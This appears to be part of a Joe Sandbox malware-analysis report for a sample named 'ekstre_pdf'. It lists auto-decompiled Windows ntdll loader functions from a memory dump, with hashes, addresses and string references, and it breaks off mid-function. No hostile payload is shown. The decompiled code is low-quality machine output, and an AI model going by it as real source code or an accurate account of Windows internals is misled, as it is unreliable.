Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 3446177414-3610490719
Opcode ID: 83e377a92e26826f694c40852f2a5d6097ee84c2a8bade5d218a7cfb34539f1f
Instruction ID: 7672f690cf2b8f943c603c6605a66b93fa4722fe53e7898d9c44827215508980
Opcode Fuzzy Hash: 83e377a92e26826f694c40852f2a5d6097ee84c2a8bade5d218a7cfb34539f1f
Instruction Fuzzy Hash: 4F91E175308B40EFF716DB24C980B5AB7E9EF84648F0045D9E8809B2A1DB38E841CB96

Uniqueness

Uniqueness Score: -1.00%

Function 34080AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210
timeCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E34080AEB(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t67;
				signed int _t70;
				signed int _t76;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t84;
				intOrPtr _t89;
				signed int _t90;
				intOrPtr _t93;
				signed char _t101;
				intOrPtr _t104;
				void* _t108;
				void* _t111;
				signed int _t113;
				intOrPtr* _t117;
				signed int _t119;
				intOrPtr* _t120;
				signed int _t121;
				intOrPtr* _t122;
				signed int _t126;
				void* _t130;
				void* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t138;
				void* _t139;
				void* _t140;
				void* _t141;

				_t134 = 0;
				_t108 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t141 =  *0x341568d8 - _t134; // 0x0
				if(_t141 != 0) {
					_v20 = 1;
				}
				if( *0x341565f9 == 0) {
					_t136 =  *((intOrPtr*)(_t108 + 4));
					while(1) {
						__eflags = _t136 - _t108;
						if(_t136 == _t108) {
							break;
						}
						_t110 = _t136 - 0x54;
						E34097550(_t136 - 0x54);
						_t136 =  *((intOrPtr*)(_t136 + 4));
					}
					goto L2;
				} else {
					L2:
					_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
					E3406FED0(0x341532d8);
					if( *0x341565f0 != 0) {
						_t126 =  *0x7ffe0330;
						_t135 =  *0x34159218; // 0x0
						_t111 = 0x20;
						_t110 = _t111 - (_t126 & 0x0000001f);
						asm("ror edi, cl");
						_t134 = _t135 ^ _t126;
					}
					_t137 = 0;
					_t67 =  *((intOrPtr*)(_t108 + 4));
					_v36 = 0;
					_v32 = _t67;
					if(_t67 == _t108) {
						L11:
						_push(0x341532d8);
						E3406E740(_t110);
						return _t137;
					} else {
						_t113 = _v16 & 0x00000100;
						_v16 = _t113;
						do {
							_t138 = _t67 - 0x54;
							if(_t113 != 0) {
								_t110 = _t138;
								_t70 = E34056DA6(_t138);
								_v36 = _t70;
								__eflags = _t70;
								if(_t70 < 0) {
									break;
								}
							}
							_t114 = _t138;
							E340698DE(_t138, 0);
							if(_t134 != 0) {
								__eflags =  *0x341565f8;
								if(__eflags == 0) {
									_t114 = _t134;
									 *0x341591e0(_t138);
									 *_t134();
									 *(_t138 + 0x35) =  *(_t138 + 0x35) | 0x00000008;
								}
							}
							_t148 = _v20;
							if(_v20 == 0) {
								_t76 =  *(_t138 + 0x28);
								_t114 = _t76;
								_t130 = 0x10;
								_v8 = _t76;
								if(E34081C7D(_t76, _t130, _t148) != 0) {
									_t117 = _v8;
									_t31 = _t117 + 2; // 0x2
									_t131 = _t31;
									do {
										_t78 =  *_t117;
										_t117 = _t117 + 2;
										__eflags = _t78 - _v12;
									} while (_t78 != _v12);
									_t114 = _t117 - _t131 >> 1;
									__eflags =  *0x341568d8;
									if( *0x341568d8 == 0) {
										_t33 = _t114 + 2; // 0x0
										_t79 = _t33;
									} else {
										_t104 =  *0x34155d4c; // 0x0
										_t79 = _t104 + 1 + _t114;
									}
									_v28 = _t79;
									_t132 = E34075D90(_t114,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t79 + _t79);
									_v24 = _t132;
									__eflags = _t132;
									if(_t132 != 0) {
										_t119 =  *0x341568d8; // 0x0
										__eflags = _t119;
										if(_t119 == 0) {
											_t120 = _v8;
											_t52 = _t120 + 2; // 0x2
											_v40 = _t52;
											do {
												_t84 =  *_t120;
												_t120 = _t120 + 2;
												__eflags = _t84 - _v12;
											} while (_t84 != _v12);
											_t121 = _t120 - _v40;
											__eflags = _t121;
											_t114 = _t121 >> 1;
											E340A88C0(_t132, _v8, (_t121 >> 1) + (_t121 >> 1));
											_t139 = _t139 + 0xc;
											L39:
											 *0x341568d8 = _v24;
											 *0x34155d4c = _v28;
											goto L9;
										}
										_t89 =  *0x34155d4c; // 0x0
										_t90 = _t89 + _t89;
										__eflags = _t90;
										_v40 = _t90;
										E340A88C0(_t132, _t119, _t90);
										_t133 = _v8;
										_t140 = _t139 + 0xc;
										_t122 = _v8;
										_t43 = _t122 + 2; // 0x2
										_v8 = _t43;
										do {
											_t93 =  *_t122;
											_t122 = _t122 + 2;
											__eflags = _t93 - _v12;
										} while (_t93 != _v12);
										_t114 = _v40 + 2;
										E340A88C0(_v24 + _v40 + 2, _t133, (_t122 - _v8 >> 1) + (_t122 - _v8 >> 1));
										_t139 = _t140 + 0xc;
										E34073BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x341568d8);
										goto L39;
									} else {
										_t101 =  *0x341537c0; // 0x0
										__eflags = _t101 & 0x00000003;
										if((_t101 & 0x00000003) != 0) {
											_push("Failed to allocated memory for shimmed module list\n");
											__eflags = 0;
											_push(0);
											_push("LdrpCheckModule");
											_push(0xaf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E340DE692();
											_t101 =  *0x341537c0; // 0x0
											_t139 = _t139 + 0x14;
										}
										__eflags = _t101 & 0x00000010;
										if((_t101 & 0x00000010) != 0) {
											asm("int3");
										}
										goto L9;
									}
								}
							}
							L9:
							E34080C2C(_t138, 1, _t114);
							 *(_t138 + 0x34) =  *(_t138 + 0x34) | 0x00000008;
							E3407DF36( *((intOrPtr*)(_t138 + 0x18)), _t138 + 0x24, 0x14ad);
							_t113 = _v16;
							_t67 =  *((intOrPtr*)(_v32 + 4));
							_v32 = _t67;
						} while (_t67 != _t108);
						_t137 = _v36;
						goto L11;
					}
				}
			}

0x34080af6
0x34080af8
0x34080afa
0x34080afd
0x34080b00
0x34080b06
0x340c9ea5
0x340c9ea5
0x34080b13
0x34080bd3
0x34080be3
0x34080be3
0x34080be5
0x00000000
0x00000000
0x34080bd8
0x34080bdb
0x34080be0
0x34080be0
0x00000000
0x34080b19
0x34080b19
0x34080b27
0x34080b2a
0x34080b36
0x34080c0d
0x34080c15
0x34080c20
0x34080c21
0x34080c23
0x34080c25
0x34080c25
0x34080b3e
0x34080b40
0x34080b43
0x34080b46
0x34080b4b
0x34080bc2
0x34080bc2
0x34080bc7
0x34080bd2
0x34080b4d
0x34080b50
0x34080b56
0x34080b59
0x34080b59
0x34080b5e
0x340c9eb1
0x340c9eb3
0x340c9eb8
0x340c9ebb
0x340c9ebd
0x00000000
0x00000000
0x340c9ec3
0x34080b66
0x34080b69
0x34080b70
0x34080bec
0x34080bf3
0x34080bfa
0x34080bfc
0x34080c02
0x34080c04
0x34080c04
0x34080bf3
0x34080b72
0x34080b76
0x34080b78
0x34080b7b
0x34080b7f
0x34080b80
0x34080b8a
0x340c9ec8
0x340c9ecb
0x340c9ecb
0x340c9ece
0x340c9ece
0x340c9ed1
0x340c9ed4
0x340c9ed4
0x340c9edc
0x340c9ede
0x340c9ee5
0x340c9ef1
0x340c9ef1
0x340c9ee7
0x340c9ee7
0x340c9eed
0x340c9eed
0x340c9ef4
0x340c9f0a
0x340c9f0c
0x340c9f0f
0x340c9f11
0x340c9f4e
0x340c9f54
0x340c9f56
0x340c9fbb
0x340c9fbe
0x340c9fc1
0x340c9fc4
0x340c9fc4
0x340c9fc7
0x340c9fca
0x340c9fca
0x340c9fd0
0x340c9fd0
0x340c9fd3
0x340c9fdd
0x340c9fe2
0x340c9fe5
0x340c9fe8
0x340c9ff0
0x00000000
0x340c9ff0
0x340c9f58
0x340c9f5d
0x340c9f5d
0x340c9f62
0x340c9f65
0x340c9f6a
0x340c9f6d
0x340c9f70
0x340c9f72
0x340c9f75
0x340c9f78
0x340c9f78
0x340c9f7b
0x340c9f7e
0x340c9f7e
0x340c9f93
0x340c9f9a
0x340c9f9f
0x340c9fb4
0x00000000
0x340c9f13
0x340c9f13
0x340c9f18
0x340c9f1a
0x340c9f1c
0x340c9f21
0x340c9f23
0x340c9f24
0x340c9f29
0x340c9f2e
0x340c9f33
0x340c9f38
0x340c9f3d
0x340c9f3d
0x340c9f40
0x340c9f42
0x340c9f48
0x340c9f48
0x00000000
0x340c9f42
0x340c9f11
0x34080b8a
0x34080b90
0x34080b96
0x34080ba1
0x34080baa
0x34080bb2
0x34080bb5
0x34080bb8
0x34080bbb
0x34080bbf
0x00000000
0x34080bbf
0x34080b4b

APIs

RtlDebugPrintTimes.NTDLL ref: 34080BFC

Strings

LdrpCheckModule, xrefs: 340C9F24
Failed to allocated memory for shimmed module list, xrefs: 340C9F1C
minkernel\ntdll\ldrinit.c, xrefs: 340C9F2E

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-161242083
Opcode ID: 2a618793e7178193010fa200b6f2c19f680c6168974ae43ac95a4789dbea33a8
Instruction ID: cf22886258cf4f013b1a38e2c681d7e4fcdd583767ca0dc995c7565ccc0f2e09
Opcode Fuzzy Hash: 2a618793e7178193010fa200b6f2c19f680c6168974ae43ac95a4789dbea33a8
Instruction Fuzzy Hash: 8071BF75B00705DFEB04DFA9CA80AAEB7F8EB84248F1544EDE845AB250E734AD42CF55

Uniqueness

Uniqueness Score: -1.00%

Function 340E43D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121
timeCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E340E43D5(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __esi;
				signed char _t37;
				signed int _t41;
				intOrPtr _t44;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				void* _t54;
				signed int _t59;
				signed int _t60;
				signed int _t64;
				signed int _t66;
				intOrPtr _t68;
				signed int _t69;
				intOrPtr _t70;

				_t68 = _a4;
				_t54 = __edx;
				_v28 = __ecx;
				_v24 = E340E4B46(_t68);
				_v12 =  *((intOrPtr*)(_t54 + 0x2c));
				_v8 =  *((intOrPtr*)(_t54 + 0x30));
				_v20 =  *((intOrPtr*)(_t54 + 0x90));
				_t37 =  *0x34156714; // 0x0
				_v16 = _t68;
				_t69 =  *0x34156710; // 0x0
				if((_t37 & 0x00000001) != 0) {
					if(_t69 == 0) {
						_t69 = 0;
						__eflags = 0;
					} else {
						_t69 = _t69 ^ 0x34156710;
					}
				}
				_t64 = _t37 & 1;
				while(_t69 != 0) {
					__eflags = E340E4528(_t54, _t69,  &_v24, _t69);
					if(__eflags >= 0) {
						if(__eflags <= 0) {
							L25:
							while(_t69 != 0) {
								_t41 = E340E4528(_t54, _t69,  &_v24, _t69);
								__eflags = _t41;
								if(_t41 != 0) {
									break;
								}
								_t66 =  *0x34155ca0; // 0x0
								__eflags = _t66;
								if(_t66 == 0) {
									L28:
									__eflags =  *0x341537c0 & 0x00000005;
									_t70 =  *((intOrPtr*)(_t69 + 0x20));
									if(( *0x341537c0 & 0x00000005) != 0) {
										_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
										_push( *((intOrPtr*)(_t44 + 0x2a8)));
										_push( *((intOrPtr*)(_t44 + 0x2a4)));
										_push(_a4);
										_push( *((intOrPtr*)(_t54 + 0x30)));
										_push( *((intOrPtr*)(_t54 + 0x2c)));
										_push( *((intOrPtr*)(_v28 + 0x30)));
										E340DE692("minkernel\\ntdll\\ldrredirect.c", 0x12b, "LdrpCheckRedirection", 2, "Import Redirection: %wZ %wZ!%s redirected to %wZ\n",  *((intOrPtr*)(_v28 + 0x2c)));
									}
									L27:
									return _t70;
								}
								 *0x341591e0( *((intOrPtr*)(_v28 + 0x28)),  *((intOrPtr*)(_t69 + 0x24)));
								_t49 =  *_t66();
								__eflags = _t49;
								if(_t49 != 0) {
									goto L28;
								}
								_t50 =  *(_t69 + 4);
								_t59 = _t69;
								__eflags = _t50;
								if(_t50 == 0) {
									while(1) {
										_t69 =  *(_t69 + 8) & 0xfffffffc;
										__eflags = _t69;
										if(_t69 == 0) {
											goto L25;
										}
										__eflags =  *_t69 - _t59;
										if( *_t69 == _t59) {
											goto L25;
										}
										_t59 = _t69;
									}
									continue;
								}
								_t69 = _t50;
								_t60 =  *_t69;
								__eflags = _t60;
								if(_t60 == 0) {
									continue;
								} else {
									goto L20;
								}
								do {
									L20:
									_t51 =  *_t60;
									_t69 = _t60;
									_t60 = _t51;
									__eflags = _t51;
								} while (_t51 != 0);
							}
							_t70 = 0xffbadd11;
							goto L27;
						}
						_t52 =  *(_t69 + 4);
						L9:
						__eflags = _t64;
						if(_t64 == 0) {
							L12:
							_t69 = _t52;
							continue;
						}
						__eflags = _t52;
						if(_t52 == 0) {
							goto L12;
						}
						_t69 = _t69 ^ _t52;
						continue;
					}
					_t52 =  *_t69;
					goto L9;
				}
				goto L25;
			}

0x340e43e2
0x340e43e5
0x340e43e7
0x340e43f3
0x340e43fa
0x340e4401
0x340e440b
0x340e440f
0x340e4414
0x340e4418
0x340e4420
0x340e4424
0x340e442e
0x340e442e
0x340e4426
0x340e4426
0x340e4426
0x340e4424
0x340e4433
0x340e445e
0x340e4443
0x340e4445
0x340e444b
0x00000000
0x340e44c0
0x340e446a
0x340e446f
0x340e4471
0x00000000
0x00000000
0x340e4473
0x340e4479
0x340e447b
0x340e44d4
0x340e44d4
0x340e44db
0x340e44de
0x340e44e6
0x340e44e9
0x340e44ef
0x340e44f9
0x340e44fc
0x340e44ff
0x340e4502
0x340e451e
0x340e4523
0x340e44c9
0x340e44d1
0x340e44d1
0x340e4489
0x340e448f
0x340e4491
0x340e4493
0x00000000
0x00000000
0x340e4495
0x340e4498
0x340e449a
0x340e449c
0x340e44b8
0x340e44bb
0x340e44bb
0x340e44be
0x00000000
0x00000000
0x340e44b2
0x340e44b4
0x00000000
0x00000000
0x340e44b6
0x340e44b6
0x00000000
0x340e44b8
0x340e449e
0x340e44a0
0x340e44a2
0x340e44a4
0x00000000
0x00000000
0x00000000
0x00000000
0x340e44a6
0x340e44a6
0x340e44a6
0x340e44a8
0x340e44aa
0x340e44ac
0x340e44ac
0x340e44b0
0x340e44c4
0x00000000
0x340e44c4
0x340e444d
0x340e4450
0x340e4450
0x340e4452
0x340e445c
0x340e445c
0x00000000
0x340e445c
0x340e4454
0x340e4456
0x00000000
0x00000000
0x340e4458
0x00000000
0x340e4458
0x340e4447
0x00000000
0x340e4447
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 340E4489

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 340E4519
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 340E4508
LdrpCheckRedirection, xrefs: 340E450F

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: 1b582f9810f2f9ee3c44a1fbe8352196f3d85f282266502decd794f4cd183185
Instruction ID: 38fb7d357963a5becbf940ebf3a4ed4415d71a515731da478f7fe00095931c23
Opcode Fuzzy Hash: 1b582f9810f2f9ee3c44a1fbe8352196f3d85f282266502decd794f4cd183185
Instruction Fuzzy Hash: 3A4104B6705B109FEB11CF59C940A66B7E8EF48658F0506DDEC58D7361D730D8A0CB81

Uniqueness

Uniqueness Score: -1.00%

Function 340E5B90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80
timeCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E340E5B90(intOrPtr __ecx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t21;
				intOrPtr _t36;
				void* _t38;
				void* _t40;

				_t36 = __ecx;
				_t21 = E3407DDA0(0, 0, 0x34031b68,  &_v8);
				if(_t21 < 0) {
					return _t21;
				}
				_t43 = _v8;
				if(E3407CF00(_t36, _t38, _v8, 0x34031b78, 0,  &_v12, 0, _v0) >= 0) {
					_t43 = _v8;
					if(E3407CF00(_t36, _t38, _v8, 0x34031b70, 0,  &_v20, 0, _v0) >= 0) {
						_t43 = _v8;
						if(E3407CF00(_t36, _t38, _v8, 0x34031b80, 0,  &_v16, 0, _v0) >= 0) {
							_t36 = _v12;
							 *0x341591e0(0, L"Wow64 Emulation Layer", __edi);
							_t40 = _v12();
							if(_t40 != 0) {
								 *0x341591e0(_t40, 4, 0, _a12, 0, _a4, 0, _a8, 0);
								_v16();
								_t36 = _v20;
								 *0x341591e0(_t40);
								_v20();
							}
						}
					}
				}
				return E3407CD80(_t36, _t43);
			}

0x340e5b90
0x340e5ba6
0x340e5bad
0x340e5c51
0x340e5c51
0x340e5bb7
0x340e5bcd
0x340e5bd2
0x340e5be8
0x340e5bed
0x340e5c03
0x340e5c05
0x340e5c0f
0x340e5c18
0x340e5c1c
0x340e5c31
0x340e5c37
0x340e5c3a
0x340e5c3e
0x340e5c44
0x340e5c44
0x340e5c47
0x340e5c03
0x340e5be8
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 340E5C0F
RtlDebugPrintTimes.NTDLL ref: 340E5C31
RtlDebugPrintTimes.NTDLL ref: 340E5C3E

Strings

Wow64 Emulation Layer, xrefs: 340E5C09

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Wow64 Emulation Layer
API String ID: 3446177414-921169906
Opcode ID: 3d2c9d49248b908fc6f97cf886a44d93a72e11c66ce9a197479efe5926057fdc
Instruction ID: 08a5cb27b8cb5b1422256a81d3ec1cae3e6bc22dac83795419c14a532bfd1365
Opcode Fuzzy Hash: 3d2c9d49248b908fc6f97cf886a44d93a72e11c66ce9a197479efe5926057fdc
Instruction Fuzzy Hash: 90212476A0051DBFEB01AAE1CD94DFF7FBCEF48699B0440D4BA11A2100E7309E519B25

Uniqueness

Uniqueness Score: -1.00%

Function 3408EE48 Relevance: 6.3, APIs: 4, Instructions: 347
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E3408EE48(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t196;
				signed int _t201;
				signed int _t202;
				intOrPtr _t206;
				signed int _t207;
				intOrPtr _t209;
				intOrPtr _t215;
				signed int _t222;
				signed int _t227;
				signed int _t228;
				signed int _t231;
				signed int _t244;
				signed int _t247;
				char* _t250;
				intOrPtr _t255;
				signed int _t269;
				signed int* _t270;
				intOrPtr _t279;
				signed char _t284;
				signed int _t291;
				signed int _t292;
				intOrPtr _t301;
				intOrPtr* _t307;
				signed int _t308;
				signed int _t309;
				intOrPtr _t313;
				intOrPtr _t314;
				intOrPtr* _t316;
				void* _t318;

				_push(0x7c);
				_push(0x3413c610);
				E340B7C40(__ebx, __edi, __esi);
				_t313 = __edx;
				 *((intOrPtr*)(_t318 - 0x48)) = __edx;
				 *((intOrPtr*)(_t318 - 0x20)) = __ecx;
				 *(_t318 - 0x58) = 0;
				 *((intOrPtr*)(_t318 - 0x74)) = 0;
				_t269 = 0;
				 *(_t318 - 0x64) = 0;
				 *((intOrPtr*)(_t318 - 0x70)) =  *((intOrPtr*)(__ecx + 0x2c)) + __ecx;
				_t196 = __edx + 0x28;
				 *((intOrPtr*)(_t318 - 0x78)) = _t196;
				 *((intOrPtr*)(_t318 - 0x84)) = _t196;
				L34072330(_t196, _t196);
				_t314 =  *((intOrPtr*)(_t313 + 0x2c));
				 *((intOrPtr*)(_t318 - 0x68)) = _t314;
				L1:
				while(1) {
					if(_t314 ==  *((intOrPtr*)(_t318 - 0x48)) + 0x2c) {
						E340724D0( *((intOrPtr*)(_t318 - 0x78)));
						asm("sbb ebx, ebx");
						 *[fs:0x0] =  *((intOrPtr*)(_t318 - 0x10));
						return  ~_t269 & 0xc000022d;
					}
					 *((intOrPtr*)(_t318 - 0x54)) = _t314 - 4;
					_t307 = 0x7ffe0010;
					_t270 = 0x7ffe03b0;
					goto L4;
					do {
						do {
							do {
								do {
									L4:
									_t201 =  *0x341567f0; // 0x0
									 *(_t318 - 0x30) = _t201;
									_t202 =  *0x341567f4; // 0x0
									 *(_t318 - 0x3c) = _t202;
									 *(_t318 - 0x28) =  *_t270;
									 *(_t318 - 0x5c) = _t270[1];
									while(1) {
										_t301 =  *0x7ffe000c;
										_t279 =  *0x7ffe0008;
										__eflags = _t301 -  *_t307;
										if(_t301 ==  *_t307) {
											goto L6;
										}
										asm("pause");
									}
									L6:
									_t270 = 0x7ffe03b0;
									_t308 =  *0x7ffe03b0;
									 *(_t318 - 0x38) = _t308;
									_t206 =  *0x7FFE03B4;
									 *((intOrPtr*)(_t318 - 0x34)) = _t206;
									__eflags =  *(_t318 - 0x28) - _t308;
									_t307 = 0x7ffe0010;
								} while ( *(_t318 - 0x28) != _t308);
								__eflags =  *(_t318 - 0x5c) - _t206;
							} while ( *(_t318 - 0x5c) != _t206);
							_t207 =  *0x341567f0; // 0x0
							_t309 =  *0x341567f4; // 0x0
							 *(_t318 - 0x28) = _t309;
							__eflags =  *(_t318 - 0x30) - _t207;
							_t307 = 0x7ffe0010;
						} while ( *(_t318 - 0x30) != _t207);
						__eflags =  *(_t318 - 0x3c) -  *(_t318 - 0x28);
					} while ( *(_t318 - 0x3c) !=  *(_t318 - 0x28));
					_t316 =  *((intOrPtr*)(_t318 - 0x68));
					_t269 =  *(_t318 - 0x64);
					asm("sbb edx, [ebp-0x34]");
					asm("sbb edx, eax");
					 *(_t318 - 0x28) = _t279 -  *(_t318 - 0x38) -  *(_t318 - 0x30) + 0x7a120;
					asm("adc edx, edi");
					asm("lock inc dword [esi+0x28]");
					_t209 =  *((intOrPtr*)(_t318 - 0x20));
					_t40 = _t209 + 0x18; // 0x3c5f770
					_t284 =  *(_t316 + 0x20) &  *_t40;
					 *(_t318 - 0x38) = _t284;
					__eflags =  *(_t316 + 0x30);
					if( *(_t316 + 0x30) != 0) {
						L37:
						_t314 =  *_t316;
						 *((intOrPtr*)(_t318 - 0x68)) = _t314;
						E3408F24A(_t318 - 0x74, _t269,  *((intOrPtr*)(_t318 - 0x54)), _t318 - 0x58, 0, _t314, _t318 - 0x74);
						__eflags =  *(_t318 - 0x58);
						if( *(_t318 - 0x58) != 0) {
							 *0x341591e0( *((intOrPtr*)(_t318 - 0x74)));
							 *(_t318 - 0x58)();
						}
						continue;
					}
					__eflags = _t284;
					if(_t284 == 0) {
						goto L37;
					}
					 *(_t318 - 0x60) = _t284;
					_t44 = _t318 - 0x60;
					 *_t44 =  *(_t318 - 0x60) & 0x00000001;
					__eflags =  *_t44;
					if( *_t44 == 0) {
						L40:
						__eflags = _t284 & 0xfffffffe;
						if((_t284 & 0xfffffffe) != 0) {
							__eflags =  *(_t316 + 0x60);
							if( *(_t316 + 0x60) == 0) {
								L14:
								__eflags =  *(_t316 + 0x3c);
								if( *(_t316 + 0x3c) != 0) {
									__eflags = _t301 -  *((intOrPtr*)(_t316 + 0x48));
									if(__eflags > 0) {
										goto L15;
									}
									if(__eflags < 0) {
										L59:
										_t146 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x3c60564
										__eflags =  *((intOrPtr*)(_t316 + 0x58)) -  *_t146;
										if( *((intOrPtr*)(_t316 + 0x58)) >=  *_t146) {
											goto L37;
										}
										goto L15;
									}
									__eflags =  *(_t318 - 0x28) -  *((intOrPtr*)(_t316 + 0x44));
									if( *(_t318 - 0x28) >=  *((intOrPtr*)(_t316 + 0x44))) {
										goto L15;
									}
									goto L59;
								}
								L15:
								__eflags =  *(_t318 + 8);
								if( *(_t318 + 8) != 0) {
									__eflags =  *(_t316 + 0x54);
									if( *(_t316 + 0x54) != 0) {
										goto L16;
									}
									goto L37;
								}
								L16:
								 *(_t318 - 0x24) = 0;
								 *(_t318 - 0x30) = 0;
								 *((intOrPtr*)(_t318 - 0x2c)) =  *((intOrPtr*)(_t316 + 0xc));
								_t215 =  *((intOrPtr*)(_t316 + 8));
								 *((intOrPtr*)(_t318 - 0x44)) =  *((intOrPtr*)(_t215 + 0x10));
								 *((intOrPtr*)(_t318 - 0x40)) =  *((intOrPtr*)(_t215 + 0x14));
								 *(_t318 - 0x5c) =  *(_t215 + 0x24);
								 *((intOrPtr*)(_t318 - 0x34)) =  *((intOrPtr*)(_t316 + 0x10));
								 *((intOrPtr*)(_t318 - 0x6c)) =  *((intOrPtr*)(_t316 + 0x14));
								 *((intOrPtr*)(_t316 + 0x5c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
								_t222 =  *((intOrPtr*)(_t318 - 0x48)) + 0x28;
								 *(_t318 - 0x8c) = _t222;
								_t291 = _t222;
								 *(_t318 - 0x28) = _t291;
								 *(_t318 - 0x88) = _t291;
								E340724D0(_t222);
								_t292 = 0;
								 *(_t318 - 0x50) = 0;
								 *(_t318 - 0x4c) = 0;
								 *(_t318 - 0x3c) = 0;
								__eflags =  *(_t316 + 0x24);
								if(__eflags != 0) {
									asm("lock bts dword [eax], 0x0");
									_t227 = 0;
									_t228 = _t227 & 0xffffff00 | __eflags >= 0x00000000;
									 *(_t318 - 0x4c) = _t228;
									 *(_t318 - 0x3c) = _t228;
									__eflags = _t228;
									if(_t228 != 0) {
										goto L17;
									}
									__eflags =  *(_t318 + 8) - 1;
									if( *(_t318 + 8) == 1) {
										L34072330( *(_t316 + 0x24) + 0x10,  *(_t316 + 0x24) + 0x10);
										_t228 = 1;
										 *(_t318 - 0x4c) = 1;
										 *(_t318 - 0x3c) = 1;
										goto L17;
									}
									_t231 = _t228 + 1;
									L35:
									 *(_t316 + 0x54) = _t231;
									__eflags = _t292;
									if(_t292 == 0) {
										L34072330(_t231,  *(_t318 - 0x28));
									}
									 *((intOrPtr*)(_t316 + 0x5c)) = 0;
									goto L37;
								}
								L17:
								__eflags =  *(_t316 + 0x30);
								if( *(_t316 + 0x30) != 0) {
									L26:
									__eflags =  *(_t318 - 0x4c);
									if( *(_t318 - 0x4c) != 0) {
										_t228 = E340724D0( *(_t316 + 0x24) + 0x10);
									}
									__eflags =  *(_t318 - 0x30);
									if( *(_t318 - 0x30) == 0) {
										L71:
										_t292 =  *(_t318 - 0x50);
										L34:
										_t231 = 0;
										goto L35;
									}
									L34072330(_t228,  *(_t318 - 0x8c));
									_t292 = 1;
									 *(_t318 - 0x50) = 1;
									__eflags =  *(_t318 - 0x24) - 0xc000022d;
									if( *(_t318 - 0x24) == 0xc000022d) {
										L69:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) == 0) {
											goto L34;
										}
										_t269 = 1;
										__eflags = 1;
										 *(_t318 - 0x64) = 1;
										_t187 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x3c60564
										E340EC726( *((intOrPtr*)(_t318 - 0x54)),  *(_t318 - 0x24),  *_t187);
										goto L71;
									}
									__eflags =  *(_t318 - 0x24) - 0xc0000017;
									if( *(_t318 - 0x24) == 0xc0000017) {
										goto L69;
									}
									__eflags =  *(_t316 + 0x18);
									if( *(_t316 + 0x18) != 0) {
										_t133 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x3c60564
										__eflags =  *_t133 -  *(_t316 + 0x18);
										if( *_t133 -  *(_t316 + 0x18) > 0) {
											goto L31;
										}
										L32:
